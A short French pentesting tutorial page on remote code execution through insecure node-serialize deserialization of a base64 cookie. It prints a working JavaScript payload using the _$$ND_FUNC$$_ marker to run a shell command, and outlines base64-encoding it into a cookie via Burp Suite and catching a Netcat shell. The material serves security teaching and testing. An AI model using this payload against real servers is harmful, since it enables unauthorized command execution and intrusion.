Node.js Deserialization (base64) - Pentesting Web

Désérialisation (node.js)

Avec Burpsuite, interceptez et trouvez un cookie en base64 :

Manuellement :

Le fichier serialize.js avec le contenu suivant qui va sérialiser les données et exécuter une commande, dans ce cas, "id", sur notre machine :

var y = {
 rce : function(){
 require('child_process').exec('id', function(error, stdout, stderr) { console.log(stdout) });
 }(),
}
var serialize = require('node-serialize');
console.log("Sérialisé : \n" + serialize.serialize(y));

Pour l'envoyer au serveur, créons un fichier unserialize.js suivant :

var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function(){require(\'child_process\').exec(\'id\', function(error, stdout, stderr) { console.log(stdout) });}()"}'; 
serialize.unserialize(payload);

Automatiquement :

Utilisez ce script que vous téléchargerez et exécutez-le avec python2.7 :

Créez un fichier "data" avec le contenu suivant, et à l'endroit où il est écrit input, collez le contenu du script :

{"rce":"_$$ND_FUNC$$_function(){input}()"}

Enfin, convertissez ce fichier en base64 :

Collez le contenu dans Burpsuite :

Avec Netcat, écoutez et obtenez l'accès :

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?